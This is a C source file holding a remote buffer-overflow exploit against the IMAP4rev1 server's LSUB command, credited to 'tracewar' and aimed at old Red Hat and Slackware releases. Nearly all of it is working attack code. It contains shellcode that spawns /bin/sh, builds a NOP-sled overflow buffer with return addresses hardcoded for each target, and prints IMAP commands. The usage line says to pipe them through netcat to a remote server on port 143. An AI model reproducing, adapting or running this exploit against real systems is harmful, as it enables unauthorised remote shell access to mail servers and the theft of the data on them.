/*
vuln:
IMAP4rev1(lsub). VERSIONS: 12.264,12.250,11.241,10.223. 
remote exploit by tracewar.
i know it's lame because the exploit use netcat, but it works so i don't care..
*/

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#define NOP "0x90" /* i love NOPS :} */

char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";

int main(int argc, char **argv){
long retaddr;
int i,offset;
char buffer[1064];
if(argc != 5){ 
printf("IMAP4rev1(lsub) remote exploit by tracewar.\n");
printf("usage: %s <username> <password> <type> <offset>|nc remote_ip 143\n",argv[0]);
printf("Types:\n");
printf("[1] Red Hat 6.2 - IMAP4rev1 v12.264\n");
printf("[2] Red Hat 6.1 - IMAP4rev1 v12.250\n");
printf("[3] Red Hat 6.0 - IMAP4rev1 v12.250\n");
printf("[4] Red Hat 5.2 - IMAP4rev1 v11.241\n");
printf("[5] Red Hat 5.1 - IMAP4rev1 v10.223\n");
printf("[6] Slackware 7.1 - IMAP4rev1 v12.264\n");
printf("[7] Slackware 7.0 - IMAP4rev1 v12.261\n");
printf("[8] Slackware 7.0 - IMAP4rev1 v2000.284\n");
printf("[9] Slackware 4.0 - IMAP4rev1 v12.250\n");
return(0);}

if(atoi(argv[3]) == 1){retaddr=0xbffff2c8;}
if(atoi(argv[3]) == 2){retaddr=0xbffff2c4;}
if(atoi(argv[3]) == 3){retaddr=0xbffff2f0;}
if(atoi(argv[3]) == 4){retaddr=0xbffff320;}
if(atoi(argv[3]) == 5){retaddr=0xbffff31c;}
if(atoi(argv[3]) == 6){retaddr=0xbffff4e0;}
if(atoi(argv[3]) == 7){retaddr=0xbffff3ec;}
if(atoi(argv[3]) == 8){retaddr=0xbfffebc8;}
if(atoi(argv[3]) == 9){retaddr=0xbffff890;}

offset=atoi(argv[4]);
memset(buffer, 0x90, 1032);
memcpy(buffer+613, shellcode, strlen(shellcode));
for(i=strlen(shellcode)+613;i<=1064;i+=4)
*(long *)&buffer[i] = retaddr - offset;
printf("1 LOGIN %s %s\r\n", argv[1], argv[2]);
printf("1 LSUB \"\" {1064}\r\n");
for(i=0; i<1064; i++) putchar(buffer[i]);
printf("\r\n");}